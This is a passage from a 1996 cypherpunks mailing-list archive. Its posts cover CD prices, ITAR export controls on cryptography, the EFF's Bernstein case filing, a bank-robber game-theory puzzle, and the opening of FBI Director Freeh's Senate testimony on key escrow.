> this, but I haven't read it in many a year.
> 
<snip>
> And there is this comment, from an admittedly off-beat source
> (http://www.zonpower.com/zonpower/book/chapters/chapter29.html):


Uh.. yabbut we were talking about insisting that her followers 
smoke, which is different from saying that smoking is cool.  
Well, for most people it is different.


So like...  back to your regularly scheduled programming or
something...


Bryce

P.S.  I wonder how often the regularly scheduled programming of
citizen units _is_ exactly?




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMfeLHUjbHy8sKZitAQHeYQMAhNJ0jS/hqhPlH4LqwetAbFypj+C51Pi8
TJIcMF3MxJcmrViWzlPx71c61pUpBkOd3XfdPYx4YkDknhi56mhUZ9q4FSu5/L4P
KmlJioiCFQrHg/SyTZoxtVJNFSUfBxLI
=aw7C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 11:17:37 +0800
To: cypherpunks@toad.com
Subject: Re: CD Prices and Inflation
Message-ID: <199607260014.RAA00302@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 AM 7/26/96 -0700, Timothy C. May wrote:

>So, what do we have now? Salaries are 2-4x higher, gold is at $375 an
>ounce, a new 3-br house averages about $100K (and is 2x that in many
>places), hamburger is at $2-3/pound, "Scietific American" sells for $3.95
>or $4.95, and paperback books go for $4.95.
>
>Roughly, then, everything on this list is 3-4 times more expensive than it
>was in the late 60s. So, those LPs I was buying for $4-5  should now cost
>$12-20, correcting for inflation/price rises.
>
>And yet I am able to find many CDs I want for $8.67 (Tower Records: "3 for
>$25" sales). And they never wear out. And they usually have 60 minutes or
>more music on them--at least the CDs I buy do--, compared to the paltry
>35-40 minutes on most LPs of the past.

>So, while I "wish" CD prices were even lower, I'm paying a lot less in
>"real dollars" for more music today than I was paying 15 years ago or 30
>years ago.

I think you're trying to hide a 5-year effect by immersing it in 30 years of 
change.  Yes, we've had inflation, but the large spurt of post-Vietnam 
inflation was basically over by about 1983, when the CD was introduced.   At 
that time, the explanations for the higher expense of CDs included the fact 
(then true) that they were costlier to manufacture due to the lower volume 
and lesser competition, as well as a lower production capacity. (all of 
these effects were essentially eliminated within 5 years or so.)   At the 
time, I recall that most vinyl was around $7 or so, and CD's typically sold 
for $15.  By 1988, therefore, CD prices should have dropped to the same as 
vinyl, plus whatever inflation had occurred in the 1983-1988 time frame.  
(20% total?)  $9.  Maybe.

You'll respond, as you did, that SOME CD's are available for $9.00  Yes.  A 
few.  (But  it's now 1996, and 1988 was 8 years ago, and back then $15 
pricing rule was not frequently broken.)  When they're on sale. But the vast 
majority are stuck, as if by glue, to the $12-$15 price range.

I think most people understand, implicitly, that "there's something going 
on."  We don't pretend to be able to quantify it, exactly, but it's there.

Here's a proposal that I think would fix the problem.  What if the copyright 
laws were amended to allow _anyone_ (individual or a company) to copy and 
sell any CD, paying the artist a royalty 20% greater than he'd get from the 
contracted record company, _and_ paying the originating record company, say, 
50 cents royalty per CD.  The company doing the "legal bootlegs" would still 
have to pay for its own production, distribution, and any other costs.  This 
wouldn't be practical if the pricing by the main record company is 
reasonable; it becomes quite profitable for them if they are in competition 
with $15 discs. 



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 26 Jul 1996 05:37:23 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607250317.UAA03425@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960725165926.733A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

hOn Wed, 24 Jul 1996, jim bell wrote:

> Date: Wed, 24 Jul 1996 20:16:52 -0800
> From: jim bell <jimbell@pacifier.com>
> To: Tom Weinstein <tomw@netscape.com>,
>     The Deviant <deviant@pooh-corner.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Netscape
> 
> At 06:39 PM 7/24/96 -0700, Tom Weinstein wrote:
> >The Deviant wrote:
> >> 
> >> I would have suggested even being as nice as "We'll do the same as MIT
> >> does with PGP's distrobution, or RSA does with RSAREF (just so you'll
> >> know, RSA's FTP basicly has a readme file that says "the files in
> >> subdir of a dir thats -r+x to you, so if you're a citizen go to
> >> dist/usaRANDOM_NUMBER_HERE", thats it).  Then make them explain why
> >> Netscape should be any different.
> >
> >MIT reportedly has a letter stating that their systems is okay.  The
> >state department wouldn't give us such a letter because they were
> >"currently reevaluating their guidelines", or some such thing.  We
> >convinced them to give us temporary permission for this system until
> >they had finalized their new policy.
> 
> 
> That still doesn't make since.
> 
> First, there were laws.  And we had to obey them.
> 
> Then, they added ITAR.  And they want us to obey it.
> 
> Finally, it seems, they're giving us "guidelines."  Not law, Not ITAR.
> 
> Next it's gonna be their their fondest desires, their preferences,and 
> finally their whims.
> 
> What's wrong with this picture?    Do I detect an ass-kissing contest?
>

Yup.. thats it.  And they said I was an idiot when I [Correctly] said
that Netscape wasn't activly fighting the ITAR.

> 
> You should have told them that if they're "evaluating their guidelines" that 
> means that NO future modifications to those guidelines is binding on you, 
> since it is not part of ITAR and is CERTAINLY not part of the law.  You 
> should have memorialized the contact with a lawyer's letter, and promptly 
> posted the new version of your software with whatever version of the 
> precautions  (MIT, RSA, or?) you felt most happy with.
> 

Or even better... Lets look at this version...

lets say I get my internet service from MCI.  Now lets say I put crypto on
my web page.  When somebody from out of the country visits my web page,
and downloads it, who's exporting it?  Them, MCI, or me?  I'd say they
are, and I doubt ITAR covers this... this is one of those things thats
covered in "guidelines". ;) umm.... Smooch Smooch?

 --Deviant
Unix is the worst operating system; except for all others.
                -- Berry Kercheval


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMferwjAJap8fyDMVAQHyMgf9EiBGYs+ZKyZ9Bq+PK8rsAbbXAzlrk0Zl
AfWnnmwiRFZjK6KwNcxqmoCtSYqu2a0V6tuDzcwwHpU/buu5GD7NBa+2BjD9FqlM
zF1nd72HKfBo8o8+ZZRyCzk+6z8vRdVp+MxTEdlyc6cHKZjih4uTGAK5GLBWaJgs
O+58WvtYWYU1r8F+OBlhNvxCkiiKRSROKO/fByX6eSf/u/J+jY5zsO/Ul+zYLvPM
ATQGLwWa4Sxvszkdqh2RcCCK7qoIeMPQ68B6pvB0nI4/suQLrTe6SHCP6kLCKT71
Cn40OmbWE7IEDaIalb7jCKMwgJB2Ut7zgWHhIMmnJVBiq8elnbRXvg==
=hR/j
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phillip <root@adam.sp.org>
Date: Fri, 26 Jul 1996 05:21:11 +0800
To: pjn@nworks.com
Subject: Re: Question
In-Reply-To: <TCPSMTP.16.7.23.-16.25.32.2645935021.655231@.nworks.com>
Message-ID: <Pine.LNX.3.94.960725170501.11043D-100000@adam.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I Think so. IMHO the goverment would say that an individual or organization
did/conspired to/whetever transport controled technolagy outside of the
country.
Thay would claim that the only thing that had changed was the mode of
transport.
Each single email, by it's self, would be legal, but if you Know of other
portions of the source being transfered, you would be part of a "Criminal
Organization". 

On Tue, 23 Jul 1996 pjn@nworks.com wrote:

> OK...A question for you all:
> 
>   If it is illegal (by our governments standards...) to export programs
> like PGP, etc., and you can send the whole source code in a message 
> because that is also considered illegal, then could you send the code,
> broken up into many pieces, and send THAT in Email, would that be 
> illegal?
> 
>   (Wow...All in one sentence... :)
> 
> 
> P.J.
> pjn@nworks.com
> 
> 
> .... I am Jesus of Borg.  Blessed are they who are assimilated.
> 
> ___ Blue Wave/QWK v2.20 [NR]
> 
> 
> 
> 

- --------------------------------------------------------------------------------
Wellcome to the next 3 levels.
- ---------------------------               -----------------------------------
pj22298@xx.acs.appstate.edu               http://xx.acs.appstate.edu/~pj22298


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfesgAxVIXeuPUw9AQG4qAf/Rly38AYT8UatQKAuuYzcc+ySFjmfv7/A
nNRiUnbkvj5TWFqsIWSdxriWRY4AX5opgn/GX5gmwu+fwxte0g2j+mvQ09pOGhhP
Nc2/272G8aPwga3j9LjpbCt//m2RQ4FETr3okb6QbnJSnB6XaZkEFw8MnhFQYCj6
/hpfSnXpAzpMxd9ulk9SpdfeCxp6gWz1zFfdhKJJpR3TVIuAsS3YpNkC1+J1NO/B
BnF7eyNmLovBvLnHX6dnoIoWkD2T2mZVJxZklwYEVFwWVCX6qyH3JFF9Q8E/bigt
xAy3ZAU9IcT9m4+mb4xsnatTDUGsJ0efKqwOdSvDnqws1qH+wRVwtA==
=bsLD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Fri, 26 Jul 1996 08:24:57 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <1.5.4.32.19960725212112.0069d924@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:03 PM 7/25/96 -0400, you wrote:
>On Thu, 25 Jul 1996, jim bell wrote:
>> My guess?  They all agree to kill whoever made that suicidal rule.  
>> Otherwise, all but two would end up dead.
>But the people at the start of the line know that if they don't 
>hang together, they will end up dead, and if that they act purely 
>selfishly only the last two will benefit. Because they want to stay 
>alive, a better solution for the first person to propose equal shares, 
>which would be opposed by the last two players, but supported by the rest.
>He could also split the money only amongst the first half of 
>the gang, since he only needs half the votes.

doh!  I just spent 20 minutes writing all the logic to that down!

And to absolutely maximize his chances of staying alive, he will divide
the money amongst robbers #2 - #10, and give up his own share.  

At least, that is the proposal I would make were I under those circumstances.

John

---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Fri, 26 Jul 1996 08:23:22 +0800
To: cypherpunks@toad.com
Subject: Re: One of the biggest problems with freedom
Message-ID: <2.2.32.19960725212455.006a3bf8@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I forget who said " The price of freedom is eternal vigilance"  but it
applies to threats both foreign and domestic. This includes the government.
I trust no one absolutely. And I among many others have helped to pay for
what freedom we have left.
( He said, in a movin' to Idaho kinda way )

cheers

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMffl2uJ+JZd/Y4yVAQHpFwQMC5f+guI+aH/mmOtnr50EVaKuhRHZjmtN
7/Q0MR2anBUuxb2b1eBzt/jzsQe1seh+yjGdF7PchDPU8cvo8d1zIRKNcYoo3uNZ
4DnGRt5aJncvOVtjA1MbbdPJppXzZvZwzbNaUsc/W6deE2Ug0zqhfVaBZ3/Qsw/f
ZvImtor9X+MmNw==
=NUjq
-----END PGP SIGNATURE-----

At 08:23 AM 7/25/96 -0700, you wrote:
>
>What our biggest problem is, is that people want the
>government to protect them from the oh so evil terrorists,
>and they will willingingly have shackles put on them,
>and rejoice when it is done.
>
>I know people who WANT the government to take away their
>rights for security, and its a lot of people, and its
>far too many people.
>
>Example:  "I don't care if the government has my keys
>for encryption.  I don't do anything wrong, and if it
>helps FBI enforce our just laws, I am all for it.  Since
>anyone who tries to get keys without legal means will end
>up in Leavenworth for the rest of their life, there is
>no problems with people getting access to those things."
>
>When I try to refute the logic:
>
>"I don't care about the bill of rights... I don't want to
>have to split my family up on separate flights so there is
>a chance of some of them arriving without dying.  I want
>the security of knowing I can fly okay without being
>blown up, thank you very much.  Signapore has little or
>no crime since the people give up their rights for a common
>good."
>
>Problem with freedom is people don't use it... and like
>a limb, will wither and fall off if not used.
>
>Our basic item should be trying to get the masses to figure
>out that freedom is important and should not be construed
>as a gift from the government.
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 26 Jul 1996 19:05:10 +0800
To: cypherpunks@toad.com
Subject: Bernstein files for partial summary judgement in crypto case
Message-ID: <199607260028.RAA10520@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's the press release on the latest development in the Bernstein
case.  Mark your calendars for the "oral arguments" on this motion,
which cypherpunks are invited to attend in full formal dress regalia.  
The hearing will occur on September 20 at high noon, in San Francisco.
Bring your Stetson.

Check the URL at the bottom of this message to see the latest filings
in the case.  It'll take us a day or two to get them all in there.  We
have statements from various crypto luminaries about the impact of
ITAR on the free exchange of software, etc.  The government's
cross-motion, arguing their side of the issue, will arrive within days,
and we'll scan that in as well.

	John


      BERNSTEIN FILES FOR PARTIAL SUMMARY JUDGMENT IN CRYPTO CASE

Claims Government's Restrictions on Export of Cryptographic Speech Violates
First Amendment

July 26, 1996  				     Electronic Frontier Foundation 

					     Contacts:
                                              Shari Steele, Staff Counsel
                                               301/375-8856, ssteele@eff.org

                                              Mike Godwin, Staff Counsel
                                               510/548-3290, mnemonic@eff.org

                                              Lori Fena, Executive Director
                                               415/436-9333, lori@eff.org


San Francisco, CA -- A University of Illinois at Chicago faculty member
who is suing the U.S. Department of State will file a motion Friday that
could strengthen his claim that government restrictions on information
about cryptography violate the First Amendment's protections for freedom
of speech. 

Relying on Judge Marilyn Hall Patel's prior ruling that computer source
code is speech protected by the First Amendment, mathematician Daniel J.
Bernstein will file a motion for partial summary judgment in his suit
against the State Department. 

In his 45-page memorandum in support of his motion, Bernstein sets forth
several First Amendment arguments: 

LEGAL ARGUMENTS

*       Any legal framework that requires a license for First Amendment
protected speech, which may be granted or withheld at the discretion of a
government official, is a prior restraint on speech.  In order for this
framework to be acceptable, the government has the burden of showing that
publication will "surely result in direct, immediate, and irreparable
damage to our Nation or its people" and that the regulation at issue is
necessary to prevent this damage.  The government has not met this burden
regarding the ITAR legal framework. 

*       Because restrictions on speech about cryptography are
content-based, the court must apply a strict scrutiny test in determining
whether individuals can be punished for engaging in this speech.  A strict
scrutiny test requires that a regulation be necessary to serve a
compelling state interest and that it is narrowly drawn to achieve that
end.  The ITAR regulatory scheme has adopted the *most* restrictive
approach by prohibiting all speech in the area of cryptography. 

*       The ITAR regulatory framework lacks the necessary procedural
safeguards.  Grants of administrative discretion must be limited by clear
standards, and judicial review must be available.  "Quite simply, the ITAR
Scheme allows its administrative agencies to make inconsistent, incorrect
and sometimes incomprehensible decisions censoring speech, all without the
protections of judicial review or oversight." 

*       The ITAR framework is unconstitutionally vague.  The government
doesn't even seem to know what its regulations include and exclude!  Here,
the lack of standards has allowed the government to misuse a statute aimed
at commercial, military arms sales to limit academic and scientific
publication. 

*       The ITAR regulatory scheme is overbroad.  In an internal memo
written almost 20 years ago, the government's own Office of Legal Counsel
concluded that the ITAR s licensing standards "are not sufficiently
precise to guard against arbitrary and inconsistent administrative
action."  The OLC specifically warned that the coverage was so broad it
could apply to "communication of unclassified information by a technical
lecturer at a university or to the conversation of a United States
engineer who meets with foreign friends at home to discuss matters of
theoretical interest."  This is exactly what is happening here, and it is
unconstitutional. 


CASE BACKGROUND

While a graduate student at the University of California at Berkeley,
Bernstein completed the development of an encryption equation (an
"algorithm") he calls "Snuffle." Bernstein wishes to publish a) the
algorithm, (b) a mathematical paper describing and explaining the
algorithm, and (c) the "source code" for a computer program that
incorporates the algorithm. Bernstein also wishes to discuss these items
at mathematical conferences, college classrooms and other open, public
meetings.  The Arms Export Control Act and the International Traffic in
Arms Regulations (the ITAR regulatory scheme) required Bernstein to submit
his ideas about cryptography to the government for review, to register as
an arms dealer, and to apply for and obtain from the government a license
to publish his ideas.  Failure to do so would result in severe civil and
criminal penalties.  Bernstein believes this is a violation of his First
Amendment rights and has sued the government. 

In the first phase of this litigation, the government argued that since
Bernstein's ideas were expressed, in part, in source code, they were not
protected by the First Amendment.  On April 15, 1996, Judge Marilyn Hall
Patel in the Northern District of California rejected that argument and
held for the first time that computer source code is protected speech for
purposes of the First Amendment. 

Because of its far-reaching implications, the Bernstein case is being
watched closely by privacy advocates, the computer industry, the export
and cryptography communities, and First Amendment activists.  In fact,
several members of these communities provided declarations that were
submitted in support of Bernstein's motion. 


ABOUT THE ATTORNEYS

Lead counsel on the case is Cindy Cohn of the San Mateo law firm of
McGlashan & Sarrail, who is offering her services pro bono.  Major
additional pro bono legal assistance is being provided by Lee Tien of
Berkeley; M. Edward Ross of the San Francisco law firm of Steefel, Levitt
& Weiss; and James Wheaton and Elizabeth Pritzger of the First Amendment
Project in Oakland. 


ABOUT THE ELECTRONIC FRONTIER FOUNDATION

The Electronic Frontier Foundation (EFF) is a non-profit civil liberties
organization working in the public interest to protect privacy, free
expression, and access to online resources and information.  EFF is a
primary sponsor of the Bernstein case.  EFF helped to find Bernstein pro
bono counsel, is a member of the Bernstein legal team, and helped collect
members of the academic community and computer industry to support this
case. 

Full text of the lawsuit and other paperwork filed in the case is
available from EFF's online archives: 

        http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/
        ftp.eff.org, pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/
        gopher.eff.org, 1/EFF/Policy/Crypto/ITAR_export/Bernstein_case/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Fri, 26 Jul 1996 11:51:47 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- solution (?)
Message-ID: <2.2.32.19960725223251.00e8eea8@labg30>
MIME-Version: 1.0
Content-Type: text/plain



At 01:13 PM 7/25/96 -0500, Igor Chudov wrote:
>Igor Chudov wrote:
>> 
>> Here's a puzzle for our game theorists.
>
>I forgot to say what the GOALS are. The goals of every individual
>cypherpunk are (in from highest to lowest priority): 
>
>1. Stay alive
>2. Get as much money as possible
>3. Keep as many cypherpunks alive as possible, all other things being equal.

The first cypherpunk should propose a 10-way split:  #s 11-20.  It's the
best offer #s 10-18 will be assured of getting without having to kill
anyone.  Once any one dies, I think the results will always boil down to #19
getting 100% of the money (when #s 1-18 are dead, #19 proposes that #19 gets
100% of the money and his vote is 50%, so he "wins".  #20 kills him out of
spite and takes it all anyway, though.  No honor amongst thieves.)

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 26 Jul 1996 15:45:24 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607251827.AA07862@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960725172813.27251B-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 25 Jul 1996 hallam@Etna.ai.mit.edu further weaseled:

> How about hard currency? I prefer Swiss francs (CHF).

Good idea, Phill.  But wait; when I wrote: 
 
> >If Phil really believes he and I are at any credible legal risk 
> >for a making such a personal wager, he is a fool.  If he really
> >knows better (my best guess), then he is intellectually dishonest 
> >and a moral coward.

Phill adroitly responded:
 
> The moral point is not that there is risk of being caught, it
> is that society has made laws and unless there are exceptional
> circumstances it is a duty to obey those laws.

[Nice try, Phill.]  The moral cowardice to which I was referring 
had nothing to do with obeying or disobeying a silly law.  It had 
to do with Phill's citing of same as a craven excuse to neither 
admit he was wrong nor to risk anything on the validity of his 
pronouncement.
 
> I don't argue against breaking laws which are immoral, indeed 
> I am still refusing to pay a Poll tax bill from the UK despite
> the fact that the amount outstanding is inconsequential.

Then his only stated objection to taking the bet has been removed.
Why do I doubt he will have the 'nads to take my generous wager?

> You sound like an 18th century fop challenging someone to a duel.

No, I am challenging Phill to benefit or lose based on his beliefs.
 
> I do not believe that Aristotle listed "challenging to a bet"
> as one of his modes of reason.

Phill invokes the classic straw man arguement.  What the bet does 
do is to test the courage of one's convictions.  I think it is 
obvious to all where Phill fits into this equation.  

Phill, can I assume then, that your answer to my proposed wager
is "no thank you"? 


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Fri, 26 Jul 1996 11:18:06 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <2.2.32.19960725225533.0070ca20@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 AM 7/25/96 -0500, you wrote:
>Here's a puzzle for our game theorists.
>
>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>how they plan to split the money: they stay in line, and the first guy
>suggests how to split the money. Then they vote on his suggestion. If
>50% or more vote for his proposal, his suggestion is adopted.
>
>Otherwise they kill the  first robber and now it is the turn of guy #2
>to make another splitting proposal. Same voting rules apply.
>
>The question is, what will be the outcome? How will they split the
>money, how many robbers will be dead, and so on?
>
>igor
>

Here's my guess:
Eache robber is going to want the largest share of the money possible.
Therefore The first guy dies automatically because that increases the share
size.  This continues on until there are only two robbers left.  Robber #19
suggests that he receives the full 20 million and since his vote is 50%, he
receives it all.  18 robbers dead.
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Fri, 26 Jul 1996 15:11:13 +0800
To: ichudov@galaxy.galstar.com
Subject: Twenty Bank Robbers -- Game theory:)
Message-ID: <Pine.BSF.3.91.960725173009.186A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
> how they plan to split the money: they stay in line, and the first guy
> suggests how to split the money. Then they vote on his suggestion. If
> 50% or more vote for his proposal, his suggestion is adopted.
> Otherwise they kill the  first robber and now it is the turn of guy #2
> to make another splitting proposal. Same voting rules apply.

I don't know the final outcome, but I do have a couple of observations...

- The person at the front of the line, making the suggestion, will always
vote for his own proposal, if only to save his own life. This is obvious. 

- The second-to-last person is in an interesting position. If everyone
before him is dead and he gets to the front of the line, he will decide
that he gets _all_ of the money for himself. If there's only two people
left, his own Yes vote for his own proposal makes 50% and he automatically
gets all the money. This is the best possible deal for him. So, I think
the second-to-last person will vote No to every proposal except his own, 
in an effort to force this situation.


Now that I think about it, solving this 'game theory' scenario has some
parallels to cryptanalysis (disclaimer: I am not a cryptanalyst). By
pointing out the above properties, I've removed a couple of 'bits' from
the 'search space'. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 26 Jul 1996 12:28:33 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: Freeh Testimony 7/25/96
Message-ID: <n1373804503.42138@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


This is the written testimony of FBI Director Freeh before the
Senate Commerce Committee on S 1726, the Pro-Code legislation.

Freeh called for the adoption of an universal key escrow system
that would facilitate law enforcement access.Several Senators were 
critical of Freeh's testimony and asked why
he and the other panelists believed that savy criminals would
use escrowed encryption. Others questioned the possibility to any
kind of world wide agreement could be reached.

Director Freeh admitted in responding to one Senator that he would
seek legislation to ban non-escrow cryptography if it were not
widely adopted. He said, "we are not at the point yet that volutary
is not vialble. At that point, we would look at mandatory controls."
He also stated that he would also ask for import controls to be 
imposed "if the country was flooded with foreign robust encryption."

A html version of this document is available at 

http://www.epic.org/crypto/export_controls/freeh.html


------------


	U.S. Department of Justice
	Federal Bureau of Investigation
	Office of the Director		Washington, D.C 20535

STATEMENT
OF
LOUIS J. FREEH
DIRECTOR
FEDERAL BUREAU OF INVESTIGATION ON
JULY 25, 1996
BEFORE THE
COMMITTEE ON COMMERCE, SCIENCE, AND TRANSPORTATION
UNITED STATES SENATE
REGARDING
IMPACT OF ENCRYPTION ON LAW ENFORCEMENT AND PUBLIC SAFETY

Thank you Mr. Chairman and members of the Committee for providing me with
this opportunity to discuss with you an issue of extreme importance and
of great concern to all of law enforcement, both domestically and abroad
-- the serious threat to public safety posed by the proliferation and use
of robust encryption products that do not allow for timely law
enforcement access and decryption.

First and foremost, the law enforcement community fully supports a
balanced encryption policy that satisfies both the commercial needs of
industry and law abiding individuals for robust encryption products while
at the same time satisfying law enforcement's public safety needs.  On
the one hand, encryption is extremely beneficial when used legitimately
to protect commercially sensitive information and communications.  On the
other, the potential use of such robust encryption products by a vast
array of criminals and terrorists to conceal their criminal
communications and information poses an extremely serious and, in my
view, unacceptable threat to public safety.  Recently, the President of
the International Association of Chiefs of Police sent a letter to
President Clinton expressing support for a balanced encryption policy
that addresses the public safety concerns of law enforcement.
Additionally, the National Sheriff's Association enacted a resolution
last month also expressing their support for a balanced encryption policy
and opposing any legislative efforts that would undercut the adoption of
such a balanced policy.

Since 1992, when AT&T announced its plan to sell a small, portable
telephone device that would provide users with low-cost but robust voice
encryption, public policy issues concerning encryption have increasingly
has been debated in the United States.  Since then, people concerned
about privacy, commerce, computer security, law enforcement, national
security, and public safety have participated in the dialogue regarding
cryptography.  On the international front, this past December, the
multi-national Organization for Economic Cooperation and Development
(OECD) meeting in Paris, France, convened an Experts Group to draft
global cryptography principles, thus reflecting an increased global
interest in and concern about the use and availability of encryption that
can be used to endanger a nation's public safety and national security.

In addition, several Members of Congress have also joined this public
discussion by introducing legislation which essentially would remove
existing export controls on encryption and which would promote the
widespread availability and use of any type of encryption product
regardless of the impact on public safety and national security.
However, the impact of these bills, should they be enacted, has not been
lost on other Members of Congress as reflected in the letters to the
sponsors of both Senate encryption bills by the Chairman and
Vice-Chairman of the Senate Select Committee on Intelligence.  Senators
Specter and Kerrey indicated in their letters that they had concerns
regarding these bills and expressed the opinion, which I fully endorse,
that there is a "... need to balance U.S. economic competitiveness with
the need to safeguard national security interests."  To that balance, I
would also add public safety and effective law enforcement.

Without question, the use of strong cryptography is important if the
Global Information Infrastructure (GII) is to fulfill its promise.  Data
must be protected -- both in transit and in storage -- if the GII is to
be used for personal communications, financial transactions, medical
care, the development of new intellectual property, and a virtually
limitless number of other applications.  Our support for robust
encryption stems from a commitment to protecting privacy and commerce.

But we are also mindful of our principal mission responsibilities:
protecting America's public safety and national security in the myriad of
criminal, terrorist, and espionage cases that confront us every day.
Notwithstanding the accepted benefits of encryption, we have long argued
that the proliferation of unbreakable encryption -- because of its
ability to completely prevent our Nation's law enforcement agencies from
understanding seized computer files and intercepted criminal
communications which have been encrypted and then being able to promptly
act to combat dangerous criminal, terrorist, and espionage activities as
well as successfully prosecute them -- would seriously and fundamentally
threaten these critical and central public safety interests.  The only
acceptable answer that serves all of our societal interests is to foster
the use of "socially-responsible" encryption products, products that
provide robust encryption, but which also permit timely law enforcement
and national security access and decryption pursuant to court order or as
otherwise authorized by law.

Law enforcement is already beginning to encounter the harmful effects of
conventional encryption in some of our most important investigations:

-  In the Aldrich Ames spy case, where Ames was told by his Soviet
handlers to encrypt computer file information to them.

-  In a child pornography case, where one of the subjects used encryption
in transmitting obscene and pornographic images of children over the
Internet.

-  In a major drug-trafficking case, where one of the subjects of one of
the court-ordered wiretaps used a telephone encryption device which
frustrated the surveillance.

-  Some of the anti-Government Militia groups are now advocating the use
of encryption as a means of preventing law enforcement from properly
investigating them.

It is important to understand, as one can see from the cases I have
cited, that conventional encryption not only can prevent electronic
surveillance efforts, which in terms of numbers are conducted sparingly,
but it also can prevent police officers on a daily basis from conducting
basic searches and seizures of computers and files.  Without an ability
to promptly decrypt encrypted criminal or terrorist communications and
computer files, we in the law enforcement community will not be able to
effectively investigate or prosecute society's most dangerous felons or,
importantly, save lives in kidnappings and in numerous other life and
death cases.  We simply will not be able to effectively fulfill our
mission of protecting the American public.

In a very fundamental way, conventional encryption has the effect of
upsetting the delicate legal balance of the Fourth Amendment, since when
a judge issues a search warrant it will be of no practical value when
this type of encryption is encountered.  Constitutionally-effective
search and seizure law assumes, and the American public fully expects,
that with warrant in hand law enforcement officers will be able to
quickly act upon seized materials to solve and prevent crimes, and that
prosecutors will be able to put understandable evidence before a jury.
Conventional encryption virtually destroys this centuries old legal
principle.

There is now an emerging opinion throughout much of the world that there
is only one solution to this national and international public safety
threat posed by conventional encryption -- that is, key escrow
encryption.  Key escrow encryption is not just the only solution; it is,
in fact, a very good solution because it effectively balances fundamental
societal concerns involving privacy, information security, electronic
commerce, public safety, and national security.  On the one hand, it
permits very strong, unbreakable encryption algorithms to be used, which
is essential for the growth of commerce over the GII and for privacy and
information security domestically and internationally.  On the other
hand, it permits law enforcement and national security agencies to
protect the American public from the tyranny of crime and terrorism.  We
believe, as do many others throughout the world, that technology should
serve society, not rule it: and that technology should be designed to
